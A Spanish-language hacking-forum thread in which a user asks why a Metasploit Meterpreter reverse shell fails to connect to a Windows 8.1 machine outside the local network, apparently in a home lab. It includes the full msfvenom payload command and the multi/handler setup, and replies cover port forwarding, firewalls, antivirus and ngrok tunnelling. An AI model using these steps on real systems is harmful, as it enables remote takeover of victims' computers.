[SOLUCIONADO] No se inicia meterpreter ( Fuera de mi red local)

Iniciado por Goaking, Agosto 12, 2018, 09:54:28 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 12, 2018, 09:54:28 PM Ultima modificación: Septiembre 30, 2018, 11:03:24 AM por xyz
Antes de nada este es mi primer post, nunca e publicado ninguno antes, espero explicarme adecuadamente.Tengo un problema/duda estoy intentando lanzar un ataque fuera de mi red local a un windows 8.1 que esta conectado a un router que tengo en mi casa ( en mi casa tengo 2 routers ) pero cuando ejecuto todos los comandos y ejecuto a su vez el archivo . exe  en el windows 8.1 no se me inica meterpreter> aqui os dejo con los comandos que utilizo y el payload

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe  LHOST=ip pública LPORT=4444-o /root/Escritorio/PruebaFueraLan.exe
Anteriormente ya e abierto el puerto
nueva terminal y ejecuto metasploit
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST mi ip
LHOST => 0.0.0.0
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on mi ip :4444

    ejecuto el exe ya enviado al windows 8.1 pero no se me inicia el meterpreter
    Si alguien me puede ayudar se lo agradeceria mucho  :) :) :)


El conocimiento es libre

Hola Goaking, en principio si ya has hecho nat en tu router para redirigir las peticiones entrantes, es decir que has abierto el puerto 4444 a la máquina atacante x.y.z.v, ya tendrías un paso realizado, después también en el parámetro de escucha LHOST me imagino como describes habrás puesto la ip de tú máquina atacante, si la configuración de metasploit la tienes configurada correctamente, creo que la clave la tendrás en el nat de tu router o en en la máquina donde estés ejecutando mestasploit, ya que puede ser que el firewall no tenga permitido aceptar esas peticiones(esto es menos probable, pero posible).
Un mundo construido sobre fantasía. Emociones sintéticas en forma de pastillas. Guerras psicológicas en forma de publicidad. Sustancias químicas que alteran la mente en forma de comida. Lavados de cerebro en forma de medios de comunicación. Agujas aisladas bajo control en forma de redes sociales.

Hola amigo antes de nada gracias por ayudarme, ya configure el nat pero sigue igual, lo probé con ngrok y funciona perfectamente, si sabes de algún otro método o alguna solución me ayudarlas bastante,gracias
El conocimiento es libre

Hola @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Super facil liberar el puerto del router.

Saludos.





Antes de nada gracias por aportar @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
A que te refieres con liberar los puertos?
Si te refieres a abrirlos si ya están abiertos los puertos y aún sigo sin poder
El conocimiento es libre

y que ip pusiste en el router? y te fijaste que ese puerto esta libre? por que puedes a ver un servicio que esta corriendo en ese puerto





@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta puse la ip privada que ya puse en su día en estática y el puerto esta libre e llegado a pensar que fuera por la compañía que tengo contratada pero lo intenté en otra red WiFi y sigue pasando lo mismo, me cuesta decirlo pero creo que me voy a rendir porque ya no se porque puede ser de todas formas muchas gracias de todas formas  dejaré el post abierto
El conocimiento es libre

puede ser que la maquina victima no ejecute el paylodad. el AV puede borrar o por ultima instancia ve el corta fuego





@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta Amigo gracias por tu ayuda pero creo que es mejor que deje este tema No tienes permitido ver enlaces. Registrate o Entra a tu cuenta quiero comerme mas la cabeza porque llevo mucho tiempo investigando y no encuentro la solución, lo que hare sera centrarme en otra cosa y  aprender otros ataques o otras cosas  como SQL injection que tengo ganas de aprender mas sobre el tema.
La verdad no me esperaba que me ayudarais porque como nunca puse ningun post no tenia mucha confianza pero ya se que este es un buen foro :) , lo bueno de todo esto esque he aprendido mucho mas sobre el tema gracias a ustedes de verdad gracias por la ayuda, si consigo algún dia conseguir hacer el ataque fuera de lan intentare ayudar a personas con el mismo problema
GRACIAS!!! ;)
El conocimiento es libre